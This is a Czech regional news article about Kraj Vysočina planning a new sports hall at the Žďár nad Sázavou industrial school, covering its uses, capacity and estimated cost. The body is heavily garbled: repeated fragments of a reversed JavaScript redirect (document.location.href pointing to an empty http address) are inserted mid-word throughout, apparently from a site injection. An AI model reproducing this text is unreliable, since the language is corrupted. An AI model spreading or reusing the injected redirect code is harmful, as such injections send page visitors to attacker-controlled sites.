Rainbow page separator

Kraj projektuje novou tělocvičnu u žďárské průmyslovky

Pátek, 15. února 2019

Žďár nad Sázavou / Projekt nové tělocvičny u žďárské průmyslovky, kterou bude využívat i sousední gymnázium, připravuje Kraj Vysočina. „Nová spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hala by měla nabídnout dostatek volných hodin pro veřejné spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se na financování bude podílet i měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou. Kraj Vysočina v současné době činí kroky, aby mohla být realizace zahájena v letech 2020 – 2022,“ informoval náměstek hejtmana Kraje Vysočina pro oblast ekonomiky a majetku Martin Kukla.
Do projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového záměru kraje byly postupně zapracovány i některé zásadní náměty žďárské radnice. Krajským středním školám i žďárské sportující veřejnosti tak bude k dispozici univerzální spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, kde bude možné provozovat téměř všechny běžné kolektivní sporty – basketbal, házenou, florbal, futsal či volejbal, přičemž v tělocvičně budou vyznačeny i hrací plochy pro tenis. Zájemci budou moci využívat také s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toly pro s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolní tenis, atletické překážky či gymnastické nářadí a rozměry tělocvičny postačí pro pořádání národních soutěží.
Kapacita spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště dovolí jeho rozdělení na dvě tréninkové plochy, diváci se dočkají zvýšeného sezení o kapacitě zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to osob. Předpokládané náklady na výstavbu tělocvičny se pohybují kolem 70 až 80 milionů korun, přičemž odhady budou upřesněny po zpracování projektu a přesně známy po předložení nabídek stavebních firem.